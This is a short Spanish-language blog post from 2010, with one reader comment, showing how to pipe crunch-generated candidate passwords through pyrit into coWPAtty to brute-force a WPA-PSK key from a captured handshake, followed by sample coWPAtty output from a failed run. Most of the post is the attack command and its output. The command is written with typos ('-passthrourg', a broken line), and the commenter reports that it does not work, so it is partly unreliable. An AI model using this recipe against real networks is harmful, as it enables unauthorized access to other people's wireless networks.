miércoles, 23 de junio de 2010

Pyrit - con Crunch y coWPAtty

Esta entrada, teniendo en cuenta lo que hemos hecho en entradas anteriores no tiene mucho misterio, pero siempre podemos complicarnos un poco mas la vida para intentar sacar una wpa, y aqui os dire como hacer para usarlo los tres programas simultaneamente para trabajar sin diccionario.

El comando seria aproximadamente como este:

./crunch 8 8 123456 | pyrit -e "ESSID" -f -passthrourg | cowpatty -d - -r captura.cap - "ESSID"

donde el uso del crunch ya lo dominamos ( o eso espero... ), pyrit selecciona el ESSID para el ataque y busqueda de la contraseña y cowpatty lee el archivo de captura y lo generado por crunch para intentar sacar la clave.

Esto en realidad no tiene mucho misterio pero es algo que nos puede llegar a salvar un poco si lo que queremos es usar los tres programas a la vez, con lo cual nos saldria algo parecido a esto:

./crunch 8 8 123456 | pyrit -e ESSID -f -
passthrough | cowpatty -d - -r captura.cap -s ESSID

cowpatty 4.3 - WPA-PSK dictionary attack.
Collected all necessary data to mount crack against WPA/PSK passphrase.
Starting dictionary attack. Please be patient.
Using STDIN for hashfile contents.
key no. 10000: 11131143
key no. 20000: 11335211
key no. 30000: 11453262
....
key no. 1660000: 66342333
key no. 1670000: 66512215
Unable to identify the PSK from the dictionary file. Try expanding your
passphrase list, and double-check the SSID. Sorry it didn't work out.
1670168 passphrases tested in 171.54 seconds: 9736.04 passphrases/second

1 comentario:

  1. No funciona el comando. Por que puede ser?
    En passthrough que hay que poner?
    Un saludo y gracias

    ResponderEliminar